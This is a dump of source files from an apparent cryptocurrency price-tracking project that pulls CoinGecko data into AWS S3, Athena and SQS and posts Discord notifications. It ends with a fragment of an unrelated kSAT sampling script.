except:\n formatted_timestamp = datetime_now().format(\"YYYY-MM-DD HH:mm:ss\")\n return formatted_timestamp\n\ndef get_coins_list():\n \"\"\"\n endpoint for getting data for coins list\n pulled out into its own component so we can easily replace \n \"\"\"\n cg = CoinGeckoAPI()\n return cg.get_coins_list()\n\ndef compress(input_data):\n \"\"\"\n gzip compression for data\n \"\"\"\n gzip_object = gzip.compress(str.encode(input_data) )\n return gzip_object\n\ndef orchestrate_historic_data_extraction():\n \n try:\n coin_list = get_coins_list()\n # coin_list = [{\"id\":\"0-5x-long-cosmos-token\"}]\n\n historic_data = []\n for each_coin in coin_list:\n if len(each_coin[\"id\"]) > 0:\n coin_id = each_coin[\"id\"]\n 
historic_data.extend(get_coins_details(coin_id=coin_id))\n print(\"✅\")\n \n ldjson = list_of_dicts_to_jsonl(historic_data)\n\n BUCKET = os.getenv('BUCKET')\n COINS_PATH = os.getenv('COINS_PATH')\n path = f\"{COINS_PATH}/historic_load.json.gz\"\n\n print(f\"bucket: {BUCKET}, path: {path}\")\n\n gzip_file = compress(ldjson)\n # write_file(input_string_data=ldjson,filepath=\"./historic_data.json\")\n write_to_storage(data=gzip_file,bucket=BUCKET,filename_path=path)\n notify_discord_bot(f\"initial load of all coins complete. written to {path}\")\n except Exception as e:\n notify_discord_bot(f\"Error with historic load - {e}\")\n\ndef notify_discord_bot(text_string):\n \"\"\"\n notifies the discord webhook\n \"\"\"\n DISCORD_BOT_WEBHOOK = os.getenv('DISCORD_BOT_WEBHOOK')\n\n list_of_messages = split_string_discord(text_string)\n\n for each_message in list_of_messages:\n time.sleep(.5)\n data = {\n \"content\": str(each_message)\n }\n response = requests.post(url=DISCORD_BOT_WEBHOOK, json=data)\n print(response)\n \n print(f\"notification complete\")\n\n\ndef split_string_discord(input_string,character_limit=1500):\n \"\"\"\n splits a string into chunks for discord notifications\n \"\"\"\n \n if len(input_string)<= character_limit:\n return [input_string]\n else:\n chunks = input_string.split('\\n')\n messages = []\n chunk_string = \"\"\n for each_item in chunks:\n\n old_chunkstring = chunk_string\n new_chunk_string = f\"{chunk_string}\\n{each_item}\"\n\n if len(new_chunk_string) > character_limit:\n messages.append(old_chunkstring)\n chunk_string = each_item\n elif each_item == chunks[-1]:\n print(\"last message\")\n messages.append(chunk_string)\n else:\n chunk_string = new_chunk_string \n \n \n return messages\n\ndef list_of_dicts_to_jsonl(list_input):\n \"\"\"\n takes a list of dict objects and turns it into a jsonl doc\n \"\"\"\n\n jsonl_contents = \"\"\n for each_entry in list_input:\n jsonl_contents = jsonl_contents + \"\\n\" + json.dumps(each_entry)\n \n return 
jsonl_contents\n\ndef write_file(input_string_data,filepath):\n \"\"\" \n write a file with data\n \"\"\"\n\n with open(filepath,\"w\") as new_file:\n new_file.write(input_string_data)\n\ndef datetime_now():\n \"\"\"\n returns UTC now time\n add .format('YYYY-MM-DD HH:mm:ss ZZ') to convert to ISO\n add .format()\n \"\"\"\n return arrow.utcnow()\n\n# write_file(input_string_data=\"hello\",filepath=\"./hello.json\")\n\ndef write_to_storage(data, bucket, filename_path):\n \"\"\"\"\n will write data to a storage location\n \"\"\"\n print(\"performing putObject\")\n client = boto3.client('s3')\n return client.put_object(Body=data, Bucket=bucket, Key=filename_path)\n\norchestrate_historic_data_extraction()" }, { "alpha_fraction": 0.6740220785140991, "alphanum_fraction": 0.6740220785140991, "avg_line_length": 27.457143783569336, "blob_id": "70231860360aae657f54e763a68e6a30438cc937", "content_id": "668a489578b4d86af5818db09029a873f51c58f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 997, "license_type": "no_license", "max_line_length": 88, "num_lines": 35, "path": "/src/marketsnapshot.py", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\"\"\"\nWill get a list of all coins in the market at the moment\n\"\"\"\nfrom pycoingecko import CoinGeckoAPI\nfrom . 
import utils\n\n\ndef get_market_snapshot():\n \"\"\"\n will call an api to get the market snapshot, returning json with a timestamp\n \"\"\"\n date_now = utils.datetime_now()\n market_snapshot = {\"date\": date_now.format('YYYY-MM-DD HH:mm:ss')}\n market_snapshot[\"data\"] = get_coins_list()\n\n year = date_now.year\n month = date_now.month\n day = date_now.day\n\n storagebucket = \"coin-analysis-data-ar-staging\"\n path = f\"snapshots/year={year}/month={month}/day={day}/snapshot.json\"\n data = utils.dict_to_jsonl(market_snapshot)\n\n status = utils.write_to_storage(data=data, bucket=storagebucket, filename_path=path)\n return status\n\ndef get_coins_list():\n \"\"\"\n endpoint for getting data for coins list\n pulled out into its own component so we can easily replace \n \"\"\"\n cg = CoinGeckoAPI()\n return cg.get_coins_list()\n\n# print(get_market_snapshot())\n\n" }, { "alpha_fraction": 0.7521514892578125, "alphanum_fraction": 0.760757327079773, "avg_line_length": 26.714284896850586, "blob_id": "801dd311ac478af85952a62f1a0e89c43edb67bf", "content_id": "2372250fa8fef19ce2bb1562ad7ce70bfb3e19ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 581, "license_type": "no_license", "max_line_length": 121, "num_lines": 21, "path": "/tests/test_single_coin_check.py", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\"\"\"\ntest the get and write of a single coin\n\"\"\"\n\nfrom src import getwatchlistdetails\nfrom src.coin_getter import cgutils\nfrom src.coin_getter import get_coins as cg_getcoins\nimport os\n\n\nBUCKET = os.getenv('BUCKET')\n# athena and s3\ngetwatchlistdetails.get_watch_list()\n\n# s3 read\n# s3 write\ncoin_data_raw = cg_getcoins.get_coin(coin_id=\"bitcoin\", days=1) #this is a list\ncoin_data_jsonl = cgutils.list_of_dicts_to_jsonl(coin_data_raw)\ns3write_status = cgutils.write_to_storage(data=coin_data_jsonl, 
bucket=BUCKET,filename_path=\"testdata/testdata-btc.json\")\n\nprint(\"testing success\")" }, { "alpha_fraction": 0.6256805658340454, "alphanum_fraction": 0.6279491782188416, "avg_line_length": 33.629920959472656, "blob_id": "030d80cf9766628a57160d7886e7b7430452df37", "content_id": "422c27efa3549676c83c3aeb8c84c67a9d138147", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4408, "license_type": "no_license", "max_line_length": 145, "num_lines": 127, "path": "/src/daily_check.py", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\n\"\"\"\ncheck prices for all coins daily, then compress it and upload the single file to s3\n\"\"\"\n\nfrom src import getwatchlistdetails\nfrom src import utils\nfrom src import marketsnapshot\nimport time\nfrom pathlib import Path\nimport os\nimport arrow\nimport gzip\n\nfrom dotenv import load_dotenv\nload_dotenv()\n\ndef join_multiple_data_files_ldjson(input_folder_path,output_path,file_prefix=None):\n \"\"\"\n \n \"\"\"\n import re\n consolidated_dataset = []\n \n output_full_path = f\"{output_path}/{file_prefix}_daily_data.json\"\n\n import os\n import glob\n try:\n list_of_files = (glob.glob(f\"{input_folder_path}/**\")) \n print(len(list_of_files))\n for each in list_of_files:\n with open(each,\"r\") as jsf:\n coin_data = jsf.read()\n coin_data = re.sub(r\"^$\\n\",\"\",coin_data)\n consolidated_dataset.append(coin_data)\n \n output_string = '\\n'.join(consolidated_dataset)\n with open(output_full_path,\"w\") as hist_file:\n hist_file.write(output_string)\n return output_full_path\n except:\n return \"\"\n\ndef rmdir(directory):\n directory = Path(directory)\n for item in directory.iterdir():\n if item.is_dir():\n rmdir(item)\n else:\n item.unlink()\n directory.rmdir()\n\n\n\n\ndef orchestrate_daily_coin_check():\n \"\"\"\n main function to do the dance of getting all coins from the list,\n then downloading them to a temp file based on 
the date\n then concatinating all files inside the dir them with a simple loop script\n then compressing them with gz\n then uploading them to s3\n \"\"\"\n\n BUCKET = os.getenv('BUCKET')\n ALL_COINS_PATH = os.getenv('ALL_COINS_PATH')\n DEBUG_WEBHOOK = os.getenv('DEBUG_WEBHOOK')\n \n coins_list = marketsnapshot.get_coins_list()\n\n # coins_list = [{\"id\":\"cointribe\"},{\"id\":\"exodia-inu\"}, {\"id\":\"gameology\"}, {\"id\":\"gameologyv2\"}, {\"id\":\"gameonetoken\"}, {\"id\":\"gamercoin\"} ]\n\n day = utils.datetime_now().shift(days=-1).format(\"YYYY-MM-DD\")\n date_year = arrow.get(day).format(\"YYYY\")\n date_month = arrow.get(day).format(\"MM\")\n date_day = arrow.get(day).format(\"DD\")\n\n temp_write_path = f\"temp_coin_dir/{day}/splitcoins\"\n temp_concatinated_file_path = f\"temp_coin_dir/{day}\"\n Path(temp_write_path).mkdir(parents=True, exist_ok=True)\n Path(temp_concatinated_file_path).mkdir(parents=True, exist_ok=True)\n\n coins_list_ids = []\n for each_item in coins_list:\n if len(each_item[\"id\"]) >0:\n coins_list_ids.append(each_item[\"id\"])\n\n #now lets process the coins\n for each_coin in coins_list_ids:\n time.sleep(0.9)\n utils.notify_discord_bot(f\"looking for {each_coin}\",DEBUG_WEBHOOK)\n try: \n latest_coin_details = getwatchlistdetails.get_coins_details(each_coin)\n \n if isinstance(latest_coin_details, list):\n ldjson = utils.list_of_dicts_to_jsonl(latest_coin_details)\n elif isinstance(latest_coin_details, dict):\n ldjson = utils.dict_to_jsonl(latest_coin_details)\n \n with open(f\"{temp_write_path}/{each_coin}.json\",\"w\") as write_file:\n write_file.write(ldjson)\n except Exception as e:\n print(f\"skipped coin {each_coin} due to errors - {e}\")\n \n utils.notify_discord_bot(f\"daily coin check for all coins complete for {day}. 
compressing and writing to s3...\",DEBUG_WEBHOOK)\n \n join_files_path = join_multiple_data_files_ldjson(input_folder_path=temp_write_path,output_path=temp_concatinated_file_path, file_prefix=day)\n gz_path = f\"{join_files_path}.gz\"\n \n #write to gz\n with open(join_files_path, 'rb') as orig_file:\n with gzip.open(gz_path, 'wb') as zipped_file:\n zipped_file.writelines(orig_file)\n\n s3_path_prefix = f\"year={date_year}/month={date_month}/day={date_day}\"\n full_path_to_write = f\"{ALL_COINS_PATH}/{s3_path_prefix}/{day}_all_coin_data.json.gz\"\n\n\n if join_files_path != None:\n #open the file \n with open(gz_path, \"rb\") as concat_file:\n concat_contents = concat_file.read()\n outcome = utils.write_to_storage(data=concat_contents,bucket=BUCKET,filename_path=full_path_to_write )\n print(outcome)\n\n rmdir(Path(\"temp_coin_dir/\"))\n utils.notify_discord_bot(f\"daily load complete - {outcome}\",DEBUG_WEBHOOK)\n \n" }, { "alpha_fraction": 0.7236841917037964, "alphanum_fraction": 0.7280701994895935, "avg_line_length": 33.25, "blob_id": "859088f2f399b78b6abbeafc0fc8986f697216c2", "content_id": "9ce4669d88b8789d01143c10b534b3fa061c8686", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 684, "license_type": "no_license", "max_line_length": 88, "num_lines": 20, "path": "/build_zip_for_lambda.sh", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# This script will build a .zip file which is ready to be deployed to lambda\n# This will move to cloudformation and build systems once we move to a ci/cd environment\n\n#ensure you have ownership \n# chmod 775 ./build_zip_for_lambda.sh\n\nrm -rf ./zip_builds/**\necho \"Deleted content in the builds directory.\\n Rebuilding...\"\nmkdir ./zip_builds/files/\ncp -R ./src ./zip_builds/files/\ncp ./lambda_function.py ./zip_builds/files/\necho \"Project files copied. 
Installing packages...\"\npip install -r requirements.txt --target ./zip_builds/files/\necho \"Copy complete. Zipping...\"\ncd ./zip_builds/files/\nzip -r ../deployment-package.zip .\nrm -rf ./zip_builds/files/**\necho \"Complete\"" }, { "alpha_fraction": 0.7335092425346375, "alphanum_fraction": 0.7374669909477234, "avg_line_length": 36.95000076293945, "blob_id": "6d97d8d7af6e1bde9ff9bbecb5a699ff88d0581c", "content_id": "c7284a5eb89b1a56fdf50d2b148b95e9743a243f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 758, "license_type": "no_license", "max_line_length": 88, "num_lines": 20, "path": "/build_zip_for_lambda_coin_getter.sh", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# This script will build a .zip file which is ready to be deployed to lambda\n# This will move to cloudformation and build systems once we move to a ci/cd environment\n\n#ensure you have ownership \n# chmod 775 ./build_zip_for_lambda.sh\necho \"building lambda zip for coin_getter\"\nrm -rf ./zip_builds/coin_getter/**\necho \"Deleted content in the builds directory.\\n Rebuilding...\"\nmkdir ./zip_builds/coin_getter/files/\ncp -R ./src/coin_getter/ ./zip_builds/coin_getter/files/\necho \"Project files copied. Installing packages...\"\npip install -r requirements.txt --target ./zip_builds/coin_getter/files/\necho \"Copy complete. 
Zipping...\"\ncd ./zip_builds/coin_getter/files/\nzip -r ../coin-getter-lambda-package.zip .\ncd ..\nrm -rf ./files/**\necho \"Complete\"" }, { "alpha_fraction": 0.6242274641990662, "alphanum_fraction": 0.6266996264457703, "avg_line_length": 25.032258987426758, "blob_id": "c478f0b9d9cb29279ddb7de69efd2739ccd716d5", "content_id": "8115cc31f75a945c4b41b93d413568bd95b76683", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 809, "license_type": "no_license", "max_line_length": 76, "num_lines": 31, "path": "/src/coin_getter/lambda_function.py", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "import cgutils\nimport get_coins\nimport time\n\n\ndef lambda_handler(sqs_event, context=\"none\"): \n \"\"\"\n main orchestration executable for coin getter.\n Runs the job with a string as event\n \"\"\"\n coin_id = cgutils.read_sqs_message(sqs_event,key_to_find=\"coin_id\")\n try:\n days = cgutils.read_sqs_message(sqs_event,key_to_find=\"days\")\n except:\n days = 1\n\n\n if len(str(coin_id))==0:\n print(\"coin not included in request. 
Exiting...\")\n return \"coin not included in request\"\n else:\n \n return get_coins.orchestrate_coin_getter(coin_id=coin_id, days=days)\n # except Exception as e:\n # print(f\"error getting coin: {e}\")\n\n\n\n# print(lambda_handler(my_message,\"\"))\n# lambda_handler(\"bitcoin\",\"\")\n# cgutils.notify_discord_bot(\"report\")\n\n\n" }, { "alpha_fraction": 0.6041948795318604, "alphanum_fraction": 0.6194181442260742, "avg_line_length": 32.1872673034668, "blob_id": "4b52f693ac8e1a4dfc333128a503af1e76d67ddb", "content_id": "52d60ee774a581c4bb192a7b65fbed22798904fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8868, "license_type": "no_license", "max_line_length": 791, "num_lines": 267, "path": "/src/getwatchlistdetails.py", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\"\"\"\nGets the watchlist and queries details for each coin in watchlist\nOutputs details in partitioned watchlist report json\n\"\"\"\nfrom datetime import date\nimport json, os, time\nimport boto3\nfrom pycoingecko import CoinGeckoAPI\nfrom requests.models import HTTPError\nfrom . 
import utils\n# import utils\n\nfrom dotenv import load_dotenv\nload_dotenv()\n\ndef queue_coins_to_get(days=1):\n \"\"\"\n will prepare list of coin ids we need and enqueue them\n \"\"\"\n print(\"queue_coins_to_get()\")\n watch_list = get_watch_list() #expects list\n cleaned_queue = []\n for each_coin in watch_list:\n if len(each_coin)>0:\n if each_coin not in cleaned_queue:\n cleaned_queue.append(each_coin)\n \n utils.batch_send_to_sqs(coin_list=cleaned_queue,days=days)\n print(\"coins enqueued\")\n\ndef orchestrate_watchlist_details_check():\n \"\"\"\n ** FOR EC2 ***\n *** MAIN ORCHESTRATOR FOR THIS FUNCTIONALITY ***\n orchestrate the querying and processing and storage of market data for coins on watchlist\n then store to s3\n \"\"\"\n print(\"orchestrate_watchlist_details_check()\")\n #query all coins on watchlist and get updated data based on query time (like now)\n watch_list = get_watch_list()\n market_coins = get_coins_data_from_market(watchlist=watch_list)\n\n\n BUCKET = os.getenv('BUCKET')\n COINS_PATH = os.getenv('COINS_PATH')\n COINS_FILENAME = os.getenv('COINS_FILENAME')\n\n date_value = utils.datetime_now()\n\n epoch = round(float(date_value.format(\"X\")))\n year = date_value.year\n month = date_value.month\n day = date_value.day\n\n path = f\"{COINS_PATH}/year={year}/month={month}/day={day}/{epoch}_{COINS_FILENAME}\"\n\n market_coins_jsonl = utils.list_of_dicts_to_jsonl(market_coins)\n status = utils.write_to_storage(data=market_coins_jsonl, bucket=BUCKET, filename_path=path)\n\n return market_coins\n # f\"Updated market details for {len(market_coins)} coins in watch list\"\n\n\n###all the components are below\n\n\ndef get_watch_list():\n \"\"\"\n performs a query from athena to get the watch list\n \"\"\"\n # today_date_epoch = utils.startofday_epohc_now\n \n \n\n ATHENA_WATCHLIST_TABLE = os.getenv('ATHENA_WATCHLIST_TABLE')\n ATHENA_DATABASE = os.getenv('ATHENA_DATABASE')\n\n query = f\"\"\"\n SELECT distinct id\n from {ATHENA_WATCHLIST_TABLE}\n 
where id != ''\n \"\"\" #change this to id for prod\n\n client = boto3.client('athena', region_name='us-east-1')\n athena_watch_list_query_id = client.start_query_execution(\n QueryString = query,\n \n QueryExecutionContext={\n 'Database': ATHENA_DATABASE,\n 'Catalog': 'AwsDataCatalog'\n },\n ResultConfiguration={\n 'OutputLocation': 's3://athena-query-results-ar-staging/',\n # 'EncryptionConfiguration': {\n # 'EncryptionOption': 'SSE_S3'|'SSE_KMS'|'CSE_KMS'\n # }\n },\n )\n\n execution_id = athena_watch_list_query_id['QueryExecutionId']\n \n #check status of query\n status = 'QUEUED'\n while status == 'RUNNING' or status == 'QUEUED':\n time.sleep(1)\n status = client.get_query_execution(QueryExecutionId=execution_id)['QueryExecution']['Status']['State']\n print(status)\n # print(f\"{status} : {execution_id} \\n\\n\")\n\n if status == 'FAILED' or status == 'CANCELLED':\n print(\"query failed!\")\n # exit(0)\n\n athena_watch_list_query_data = client.get_query_results(\n QueryExecutionId=execution_id,\n # NextToken='string',\n # MaxResults=123\n )\n\n #clean up this data\n watchlist = extract_values_from_query_response(athena_watch_list_query_data)\n return watchlist\n\n\n\ndef extract_values_from_query_response(input_payload=None):\n \"\"\"\n takes query results data and returns a list.\n SQS\n \"\"\"\n # mockdata = {'UpdateCount': 0, 'ResultSet': {'Rows': [{'Data': [{'VarCharValue': 'symbol'}]}, {'Data': [{'VarCharValue': 'pappay'}]}, {'Data': [{'VarCharValue': 'akira'}]}, {'Data': [{'VarCharValue': 'akita'}]}], 'ResultSetMetadata': {'ColumnInfo': [{'CatalogName': 'hive', 'SchemaName': '', 'TableName': '', 'Name': 'symbol', 'Label': 'symbol', 'Type': 'varchar', 'Precision': 2147483647, 'Scale': 0, 'Nullable': 'UNKNOWN', 'CaseSensitive': True}]}}, 'ResponseMetadata': {'RequestId': '540e0078-bd31-40e0-9e8e-07d81c1f7496', 'HTTPStatusCode': 200, 'HTTPHeaders': {'content-type': 'application/x-amz-json-1.1', 'date': 'Sun, 31 Oct 2021 02:57:15 GMT', 'x-amzn-requestid': 
'540e0078-bd31-40e0-9e8e-07d81c1f7496', 'content-length': '690', 'connection': 'keep-alive'}, 'RetryAttempts': 0}}\n # input_payload = mockdata\n\n coins = []\n\n rows = input_payload['ResultSet']['Rows']\n for each_row in rows:\n for each in each_row['Data']:\n for key, value in each.items():\n coins.append(value)\n del coins[0] #remove header\n return coins\n\n\n\n\ndef get_coins_data_from_market(watchlist):\n \"\"\"\n \n given a list of items, query an endpoint and return the data into a list\n then store to s3\n \"\"\"\n\n coins_with_details = []\n for each_coin in watchlist:\n time.sleep(1.1)\n print(f\"looking for {each_coin}\")\n try: \n coins_with_details.append(get_coins_details(each_coin) )\n except:\n print(f\"skipped coin {each_coin} due to errors\")\n \n return coins_with_details\n\n\ndef get_coins_details(coin_id ):\n \"\"\"\n endpoint for getting data for coins details\n pulled out into its own component so we can easily replace \n end_date is required. this allows us to cap the report in days\n \"\"\"\n print(f\"getting coin details for: {coin_id}\")\n cg = CoinGeckoAPI()\n\n max_retries = 10\n retry_number = 0\n wait = 61\n success = False\n while success == False and retry_number < max_retries:\n try:\n coin_details = cg.get_coin_market_chart_by_id(id=coin_id,vs_currency=\"aud\", days=\"max\", interval=\"daily\") #get the 24 hour \n success = True\n except HTTPError as e:\n if e.response.status_code == 429:\n retry_number = retry_number + 1\n print(f\"too many requests error. 
Waiting {wait} seconds\")\n time.sleep(wait) #wait for this to ease up by waiting for a minute\n else:\n break\n \n\n latest_coin_details = extract_latest_market_value_for_coin(coin_details)\n latest_coin_details[\"id\"] = coin_id #add id to help us joins\n\n return latest_coin_details\n\ndef extract_latest_market_value_for_coin(coin_details):\n \"\"\"\n for coingecko, looks at market data and only gets the values with associated epoch \n \"\"\"\n try:\n latest_coin_data = {\n \"date\": utils.epoch_to_timestamp(coin_details[\"prices\"][-2][0]), #was -1 for latest. lets just get the minight volume\n \"prices\": coin_details[\"prices\"][-2][-1],\n \"market_caps\": coin_details[\"market_caps\"][-2][-1],\n \"total_volumes\": coin_details[\"total_volumes\"][-2][-1],\n \"age\": len(coin_details[\"total_volumes\"])-2\n }\n except:\n latest_coin_data = {\n \"date\": utils.datetime_now().format(\"YYYY-MM-DD HH:mm:ss\"),\n \"prices\": 0,\n \"market_caps\": 0,\n \"total_volumes\": 0,\n \"age\": 0\n }\n\n\n \n\n return latest_coin_data\n\n\ndef extract_historical_market_value_for_coins(coin_details,coin_id,days):\n\n print(\"extract_historical_market_value_for_coins()\")\n end_entry = -1 #the entry which isn't the time at the call - looks like range uses the last item the same as a < symbol. \n\n coins_to_get_startingpoint = 0\n coin_history = []\n\n #apply the indexing based on start and end\n coin_index = []\n \n print(coin_details[\"prices\"][coins_to_get_startingpoint:end_entry])\n for eachindex in coin_details[\"prices\"][coins_to_get_startingpoint:end_entry]:\n # print(eachindex)\n coin_index.append(coin_details[\"prices\"].index(eachindex))\n\n age = 0\n for each_entry in coin_index:\n coin_data = {\n \"id\": coin_id,\n \"date\": utils.epoch_to_timestamp(coin_details[\"prices\"][each_entry][0]), #was -1 for latest. 
lets just get the minight volume\n \"prices\": coin_details[\"prices\"][each_entry][-1],\n \"market_caps\": coin_details[\"market_caps\"][each_entry][-1],\n \"total_volumes\": coin_details[\"total_volumes\"][each_entry][-1],\n \"age\": age\n }\n age = age + 1\n coin_history.append(coin_data)\n \n return coin_history\n\n\n\n\n# print(get_watch_list() )\n# extract_values_from_query_response()\n\n# print(get_coins_details('akira') )\n# print(utils.startofday_epohc_now() )\n\n# print(orchestrate_watchlist_details_check() )\n\n# for each in range(0,100):\n# print(get_coins_details('akira'))\n \n\n\n" }, { "alpha_fraction": 0.5528700947761536, "alphanum_fraction": 0.5589123964309692, "avg_line_length": 25.95475196838379, "blob_id": "ee5710429cfd00e6b7b86d089d2b0cda18cc9d5b", "content_id": "1a53cb4b492bb705c71629805b66bffb084bbf11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5958, "license_type": "no_license", "max_line_length": 93, "num_lines": 221, "path": "/src/utils.py", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "\"\"\"\nShared utilities\n\"\"\"\n\nimport arrow, json, time\nimport re, os\nimport boto3\nimport requests\nfrom dotenv import load_dotenv\nload_dotenv()\n\ndef datetime_now():\n \"\"\"\n returns UTC now time\n add .format('YYYY-MM-DD HH:mm:ss ZZ') to convert to ISO\n add .format()\n \"\"\"\n return arrow.utcnow()\n\ndef startofday_epohc_now():\n \"\"\"\n give the epoch of the time at 00:00 hrs in epoch\n \"\"\"\n now_date = arrow.utcnow().format(\"YYYY-MM-DD\")\n now_epoch = arrow.get(now_date).format(\"X\")\n now_epoch = re.sub(r\"\\.0\",\"000\",now_epoch)\n \n return now_epoch\n\ndef epoch_to_timestamp(epoch_string):\n \"\"\"\n converts data from epoch to athena friendly timestamp\n \"\"\"\n \n epoch_string_clean = str(int(epoch_string/1000) ) #remove milliseconds\n try:\n formatted_timestamp = 
arrow.get(epoch_string_clean,\"X\").format(\"YYYY-MM-DD HH:mm:ss\")\n except:\n formatted_timestamp = datetime_now().format(\"YYYY-MM-DD HH:mm:ss\")\n return formatted_timestamp\n\n\ndef dict_to_jsonl(dict_input):\n \"\"\"\n takes a dict object and turns it into a jsonl doc\n \"\"\"\n\n jsonl_contents = json.dumps(dict_input)\n jsonl_contents = re.sub(f\"\\n\",\"\",jsonl_contents)\n return jsonl_contents\n\n\ndef list_of_dicts_to_jsonl(list_input):\n \"\"\"\n takes a list of dict objects and turns it into a jsonl doc\n \"\"\"\n\n jsonl_contents = \"\"\n for each_entry in list_input:\n jsonl_contents = jsonl_contents + \"\\n\" + json.dumps(each_entry)\n\n \n return jsonl_contents\n\n\ndef write_to_storage(data, bucket, filename_path):\n \"\"\"\"\n will write data to a storage location\n \"\"\"\n print(\"performing putObject\")\n client = boto3.client('s3')\n return client.put_object(Body=data, Bucket=bucket, Key=filename_path)\n \ndef read_from_storage(bucket, filename_path):\n \"\"\"\n will read data from a storage location *s3\n \"\"\"\n client = boto3.client('s3')\n response = client.get_object(\n Bucket=bucket,\n Key=filename_path,\n )\n return response\n\ndef notify_discord_bot(text_string,webhook=None):\n \"\"\"\n notifies the discord webhook\n \"\"\"\n if webhook == None:\n DISCORD_BOT_WEBHOOK = os.getenv('DISCORD_BOT_WEBHOOK')\n else:\n DISCORD_BOT_WEBHOOK = webhook\n\n list_of_messages = split_string_discord(text_string)\n\n for each_message in list_of_messages:\n time.sleep(.5)\n data = {\n \"content\": str(each_message)\n }\n response = requests.post(url=DISCORD_BOT_WEBHOOK, json=data)\n print(response)\n \n print(f\"notification complete\")\n\n\ndef split_string_discord(input_string,character_limit=1500):\n \"\"\"\n splits a string into chunks for discord notifications\n \"\"\"\n \n if len(input_string)<= character_limit:\n return [input_string]\n else:\n chunks = input_string.split('\\n')\n messages = []\n chunk_string = \"\"\n for each_item in 
chunks:\n\n old_chunkstring = chunk_string\n new_chunk_string = f\"{chunk_string}\\n{each_item}\"\n\n if len(new_chunk_string) > character_limit:\n messages.append(old_chunkstring)\n chunk_string = each_item\n elif each_item == chunks[-1]:\n print(\"last message\")\n messages.append(chunk_string)\n else:\n chunk_string = new_chunk_string \n \n \n return messages\n\n\ndef batch_send_to_sqs(coin_list,days=1):\n \"\"\"\n uses batch mode for sqs send to allow 10 coins to be queued per\n \"\"\"\n sqs = boto3.client('sqs')\n\n # queue = sqsResource.get_queue_by_name(QueueName='coin-watch-list')\n SQS_QUEUE_URL = os.getenv('SQS_QUEUE_URL')\n maxBatchSize = 1 #current maximum allowed is 10\n chunks = [coin_list[x:x+maxBatchSize] for x in range(0, len(coin_list), maxBatchSize)]\n time_to_wait = 0\n time_to_wait_interval = 2 #seconds\n for chunk in chunks:\n \n entries = []\n for x in chunk:\n entry = {\n 'Id': str(x),\n 'MessageBody': 'Sent for coin analysis', \n #'MessageGroupId': 'coin-getter',\n #'MessageDeduplicationId': str(x),\n 'MessageAttributes': {\n 'coin_id': {\n 'DataType': 'String',\n 'StringValue': str(x)\n },\n 'days': {\n 'DataType': 'String',\n 'StringValue': str(days)\n }\n }\n }\n entries.append(entry)\n wait_time = time_to_wait + time_to_wait_interval\n response = sqs.send_message_batch(QueueUrl=SQS_QUEUE_URL,Entries=entries)\n print(response)\n\ndef send_to_sqs(coin_id):\n \"\"\"\n send a message to the sqs queue specified by the environment variable\n \"\"\"\n # Create SQS client\n sqs = boto3.client('sqs')\n\n SQS_QUEUE_URL = os.getenv('SQS_QUEUE_URL')\n\n # Send message to SQS queue\n response = sqs.send_message(\n QueueUrl=SQS_QUEUE_URL,\n DelaySeconds=0,\n MessageGroupId=\"coin-getter\",\n MessageDeduplicationId=str(coin_id),\n MessageAttributes={\n 'coin_id': {\n 'DataType': 'String',\n 'StringValue': str(coin_id)\n }\n },\n MessageBody=(\n 'Sent for coin analysis'\n )\n )\n\n print(response['MessageId'])\n\ndef dynamo_put_coin(coin_id, days, 
dynamodb=None):\n \n table = dynamodb.Table('watchlist')\n response = table.put_item(\n Item={\n 'year': year,\n 'title': title,\n 'info': {\n 'plot': plot,\n 'rating': rating\n }\n }\n )\n return response\n\n\n# send_to_sqs(str(\"bitcoin\"))\n# send_to_sqs(str(\"SurfMoon\"))\n\n# mylist = [\"shibgf\"]\n# batch_send_to_sqs(mylist,days='max')\n\n" } ]
20
alexandreday/kSAT_sample
https://github.com/alexandreday/kSAT_sample
9d4ed1228b316130fe9c463afdb7718744a2a454
70b3634d747400e030eb792681aa50f9311000d4
6f3033db8d2ce7c6fd39303b8abd9acbc9ebd338
refs/heads/master
2018-09-21T18:05:12.079940
2018-06-06T17:37:49
2018-06-06T17:37:49
107,302,324
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5825123190879822, "alphanum_fraction": 0.5899015069007874, "avg_line_length": 22.882352828979492, "blob_id": "67a671ed2a2c75b9b4260aa10e02befa581b83d8", "content_id": "8153e252e4a4ec6519ebe93ae024c6586cb15890", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 812, "license_type": "no_license", "max_line_length": 116, "num_lines": 34, "path": "/script_run/main_kSAT.py", "repo_name": "alexandreday/kSAT_sample", "src_encoding": "UTF-8", "text": "import sys, os\n\n############################ READ COMMAND LINE ##########################\n\nargv = sys.argv\nassert len(argv) == 4 # need to specify number of clauses, alpha and number of samples\nargv = argv[1:]\n\nparam_type={\n 'M':int,\n 'N':int,\n 'n_sample':int\n}\n\nparam = {}\n\nfor a in argv:\n k, v = a.split('=')\n v = int(float(v))\n param[k] = v\n\nprint(param)\nalpha = param['M']/param['N']\n\nnew_dir = 'alpha=%.3f'%alpha\ncmd = 'mkdir %s'%new_dir\ncmd_rm = 'rm -rf %s'%new_dir\nos.system(cmd_rm) # create new 